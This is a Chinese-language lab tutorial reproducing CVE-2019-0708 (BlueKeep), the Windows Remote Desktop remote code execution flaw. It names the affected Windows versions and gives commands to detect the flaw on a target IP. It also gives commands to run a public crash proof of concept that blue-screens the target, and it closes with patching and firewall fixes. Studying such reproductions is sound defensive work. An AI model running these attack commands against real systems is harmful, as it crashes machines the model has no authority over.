Windows RDP远程代码执行 CVE-2019-0708 漏洞复现

漏洞简介

Windows操作系统远程桌面服务远程代码执行漏洞（CVE-2019-0708） ， 2019年5月14日微软官方发布安全补丁,修复了windows远程桌面服务的远程代码执行漏洞,该漏洞影响了某些旧版本的Windows系统。此漏洞是预身份验证且无需用户交互,这就意味着这个漏洞可以通过网络蠕虫的方式被利用。利用此漏洞的任何恶意软件都可能从被感染的计算机传播到其他易受攻击的计算机。

影响版本

Windows 7

Windows server 2008 R2

Windows server 2008

Windows 2003

Windows xp

Windows 8和windows10以及之后的版本不受此漏洞影响

漏洞环境

攻击机：Windows 10

靶机：Windows 7

两机处于同一网络

攻击机安装python 3

靶机开启远程连接服务，即开启3389端口，关闭防火墙或者在防火墙策略中放行3389端口

漏洞复现

靶机查看是否开启3389端口

netstat -an

攻击机检测靶机是否存在该漏洞

检测工具下载： https://free.360totalsecurity.com/CVE-2019-0708/detector_release.zip

使用方法：

0708Detector_v2_x64.exe -t 192.168.30.153 -p 3389

出现如上提示，则说明应该存在该漏洞

进行攻击

攻击POC下载： https://github.com/n1xbyte/CVE-2019-0708

使用 python 安装 impacket模块

py -3 -m pip install  impacket

然后使用攻击的python脚本

py -3 crashpoc.py 192.168.30.153 64

靶机蓝屏，则攻击成功

漏洞修复

下载补丁：https://portal.msrc.microsoft.com/zh-cn/security-guidance/advisory/CVE-2019-0708

关闭3389远程桌面端口

开启防火墙

更新系统